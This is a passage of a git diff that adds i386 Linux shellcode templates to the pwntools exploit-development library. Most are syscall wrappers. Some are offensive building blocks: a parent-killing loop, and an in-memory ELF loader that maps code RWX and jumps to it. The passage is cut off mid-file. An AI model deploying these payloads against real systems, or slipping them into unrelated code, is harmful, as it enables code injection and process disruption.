See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getsockname.asm b/pwnlib/shellcraft/templates/i386/linux/getsockname.asm new file mode 100644 index 000000000..3d32a3c83 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm b/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm new file mode 100644 index 000000000..1a1822d97 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm new file mode 100644 index 000000000..5125708d0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/i386/linux/getuid.asm b/pwnlib/shellcraft/templates/i386/linux/getuid.asm new file mode 100644 index 000000000..b87a941c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/i386/linux/gtty.asm b/pwnlib/shellcraft/templates/i386/linux/gtty.asm new file mode 100644 index 000000000..6c1784eb6 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ioctl.asm b/pwnlib/shellcraft/templates/i386/linux/ioctl.asm new file mode 100644 index 000000000..c82d5633a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ioperm.asm b/pwnlib/shellcraft/templates/i386/linux/ioperm.asm new file mode 100644 index 000000000..aa4d777fc --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/i386/linux/iopl.asm b/pwnlib/shellcraft/templates/i386/linux/iopl.asm new file mode 100644 index 000000000..0669b5a12 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/i386/linux/kill.asm b/pwnlib/shellcraft/templates/i386/linux/kill.asm new file mode 100644 index 000000000..464c26a16 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/i386/linux/killparent.asm b/pwnlib/shellcraft/templates/i386/linux/killparent.asm new file mode 100644 index 000000000..71faf16e1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('eax', SIGKILL)} + test eax, eax + jz ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/i386/linux/lchown.asm b/pwnlib/shellcraft/templates/i386/linux/lchown.asm new file mode 100644 index 000000000..4a8c6c83b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/i386/linux/link.asm b/pwnlib/shellcraft/templates/i386/linux/link.asm new file mode 100644 index 000000000..105b4fa42 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/i386/linux/linkat.asm b/pwnlib/shellcraft/templates/i386/linux/linkat.asm new file mode 100644 index 000000000..99c337372 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/listen.asm b/pwnlib/shellcraft/templates/i386/linux/listen.asm new file mode 100644 index 000000000..6be300499 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/i386/linux/loader.asm b/pwnlib/shellcraft/templates/i386/linux/loader.asm new file mode 100644 index 000000000..ca80d6793 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/loader.asm @@ -0,0 +1,173 @@ +<% + from pwnlib.shellcraft.i386.linux import exit as exit + from pwnlib.shellcraft.i386.linux import mmap + from pwnlib.shellcraft.i386 import setregs + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +<% +elf_magic = unpack('\x7fELF') +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') +""" +Elf32_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf32_Half + +0x0012 e_machine : Elf32_Half + +0x0014 e_version : Elf32_Word + +0x0018 e_entry : Elf32_Addr + +0x001c e_phoff : Elf32_Off + +0x0020 e_shoff : Elf32_Off + +0x0024 e_flags : Elf32_Word + +0x0028 e_ehsize : Elf32_Half + +0x002a e_phentsize : Elf32_Half + +0x002c e_phnum : Elf32_Half + +0x002e e_shentsize : Elf32_Half + +0x0030 e_shnum : Elf32_Half + +0x0032 e_shstrndx : Elf32_Half + +Elf32_Phdr + +0x0000 p_type : Elf32_Word + +0x0004 p_offset : Elf32_Off + +0x0008 p_vaddr : Elf32_Addr + +0x000c p_paddr : Elf32_Addr + +0x0010 p_filesz : Elf32_Word + +0x0014 p_memsz : Elf32_Word + +0x0018 p_flags : Elf32_Word + +0x001c p_align : Elf32_Word +""" +e_entry = 0x0018 +e_phoff = 0x001c +e_phnum = 0x002c +e_phentsize = 0x002a +p_type = 0x0000 +p_offset = 0x0004 +p_vaddr = 0x0008 +p_filesz = 0x0010 +p_memsz = 0x0014 + + +PT_LOAD = 1 +%> + + ${setregs({'esi': address})} + + /* Check the ELF header */ + mov eax, dword ptr [esi] + cmp eax, ${elf_magic} + jnz ${die} + + /* Discover program headers */ + mov eax, esi + add eax, dword ptr ${e_phoff} + mov eax, [eax] + add eax, esi /* eax = &program headers */ + + mov ebx, esi + add ebx, ${e_phentsize} + movzx ebx, word ptr [ebx] /* ebx = sizeof(program header) */ + + mov ecx, esi + add ecx, ${e_phnum} + movzx ecx, word ptr [ecx] /* ecx = # of program headers */ + +1: + /* For each section header, mmap it to the desired address */ + push esi + push ecx + push ebx + push eax + call ${load_one} + pop eax + pop ebx + pop ecx + pop esi + add eax, ebx + loop 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + mov eax, esi + add eax, ${e_entry} + mov eax, [eax] + + /* Set up the fake stack. + /* AT_NULL */ + xor ebx, ebx + push ebx + push ebx + /* AT_RANDOM */ + push esp + push 25 + + push ebx /* envp */ + push ebx /* argv */ + push ebx /* argc */ + + /* Invoke the entry point */ + jmp eax + +${load_one}: + push ebp + mov ebp, esp + + /* If it's not a PT_LOAD header, don't care */ + mov ebx, eax + /* add ebx, ${p_type} == zero */ + cmp dword ptr [ebx], ${PT_LOAD} + jnz ${next_phdr} + + /* Get the destination address into edi */ + mov edi, eax + add edi, ${p_vaddr} + mov edi, [edi] + + /* Get the size to mmap into ebx */ + mov ebx, eax + add ebx, ${p_memsz} + mov ebx, [ebx] + shr ebx, 12 + inc ebx + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + shl ebx, 12 + 4 + + /* Map the page in */ + pushad + ${mmap('edi', 'ebx', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + popad + + /* Get the source address into esi */ + mov ebx, eax + add ebx, ${p_offset} + mov ebx, [ebx] + add esi, ebx + + /* Get the number of bytes into ecx */ + mov ecx, eax + add ecx, ${p_filesz} + mov ecx, [ecx] + + /* Copy the data */ + cld + rep movsb + +${next_phdr}: + mov esp, ebp + pop ebp + ret + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/i386/linux/loader_append.asm b/pwnlib/shellcraft/templates/i386/linux/loader_append.asm new file mode 100644 index 000000000..19c5623b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/loader_append.asm @@ -0,0 +1,55 @@ +<% + from pwnlib.shellcraft.i386.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + + >>> gcc = process(['gcc','-m32','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + >>> gcc.write(''' + ... int main() { + ... printf("Hello, %s!\\n", "i386"); + ... } + ... ''') + >>> gcc.shutdown('send') + >>> gcc.poll(True) + 0 + >>> sc = shellcraft.loader_append('a.out') + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> run_assembly(sc).recvline() == 'Hello, i386!\n' + # True + + +<%page args="data = None"/> +<% +elf_data = common.label('elf_data') +load = common.label('load') +%> + jmp ${elf_data} +${load}: + pop eax + ${loader('eax')} +${elf_data}: + call ${load} +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/i386/linux/lseek.asm b/pwnlib/shellcraft/templates/i386/linux/lseek.asm new file mode 100644 index 000000000..8484893fe --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/i386/linux/lstat.asm b/pwnlib/shellcraft/templates/i386/linux/lstat.asm new file mode 100644 index 000000000..44e0ece0e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/lstat64.asm b/pwnlib/shellcraft/templates/i386/linux/lstat64.asm new file mode 100644 index 000000000..b07b06863 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/madvise.asm b/pwnlib/shellcraft/templates/i386/linux/madvise.asm new file mode 100644 index 000000000..861f783db --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mincore.asm b/pwnlib/shellcraft/templates/i386/linux/mincore.asm new file mode 100644 index 000000000..3855d66cf --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mkdir.asm b/pwnlib/shellcraft/templates/i386/linux/mkdir.asm new file mode 100644 index 000000000..e85b9085d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm b/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm new file mode 100644 index 000000000..45ff7aaf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mknod.asm b/pwnlib/shellcraft/templates/i386/linux/mknod.asm new file mode 100644 index 000000000..9e30ea877 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mknodat.asm b/pwnlib/shellcraft/templates/i386/linux/mknodat.asm new file mode 100644 index 000000000..77aaf90b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mlock.asm b/pwnlib/shellcraft/templates/i386/linux/mlock.asm new file mode 100644 index 000000000..0d5744372 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mlockall.asm b/pwnlib/shellcraft/templates/i386/linux/mlockall.asm new file mode 100644 index 000000000..87753445a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mmap.asm b/pwnlib/shellcraft/templates/i386/linux/mmap.asm new file mode 100644 index 000000000..8d5e5c268 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mmap.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mprotect.asm b/pwnlib/shellcraft/templates/i386/linux/mprotect.asm new file mode 100644 index 000000000..1b51c2adb --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm b/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm new file mode 100644 index 000000000..59721f4d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_open.asm b/pwnlib/shellcraft/templates/i386/linux/mq_open.asm new file mode 100644 index 000000000..04a696c0a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm new file mode 100644 index 000000000..f7a02f056 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm new file mode 100644 index 000000000..317ae8d29 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm new file mode 100644 index 000000000..a4f9cf2ef --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/mremap.asm b/pwnlib/shellcraft/templates/i386/linux/mremap.asm new file mode 100644 index 000000000..49b68de4d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/msync.asm b/pwnlib/shellcraft/templates/i386/linux/msync.asm new file mode 100644 index 000000000..70f0b48d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/munlock.asm b/pwnlib/shellcraft/templates/i386/linux/munlock.asm new file mode 100644 index 000000000..aaf904e45 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/munlockall.asm b/pwnlib/shellcraft/templates/i386/linux/munlockall.asm new file mode 100644 index 000000000..114d496b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/i386/linux/munmap.asm b/pwnlib/shellcraft/templates/i386/linux/munmap.asm new file mode 100644 index 000000000..0817bf8ec --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm b/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm new file mode 100644 index 000000000..2fca43e45 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/i386/linux/nice.asm b/pwnlib/shellcraft/templates/i386/linux/nice.asm new file mode 100644 index 000000000..45110d1a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/i386/linux/open.asm b/pwnlib/shellcraft/templates/i386/linux/open.asm new file mode 100644 index 000000000..c4229d680 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/openat.asm b/pwnlib/shellcraft/templates/i386/linux/openat.asm new file mode 100644 index 000000000..11e65a4f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pause.asm b/pwnlib/shellcraft/templates/i386/linux/pause.asm new file mode 100644 index 000000000..0da5b8e4a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/i386/linux/pidmax.asm b/pwnlib/shellcraft/templates/i386/linux/pidmax.asm new file mode 100644 index 000000000..f843e53dd --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pidmax.asm @@ -0,0 +1,41 @@ +<% from pwnlib.shellcraft.i386 import push, mov %> +<% from pwnlib.shellcraft.i386.linux import syscall %> +<% from pwnlib.shellcraft import common %> +<%docstring> +Retrieves the highest numbered PID on the system, according to +the sysctl kernel.pid_max. + +<% +CTL_KERN=1 +KERN_PIDMAX=55 + +""" +struct __sysctl_args { + int *name; /* integer vector describing variable */ + int nlen; /* length of this vector */ + void *oldval; /* 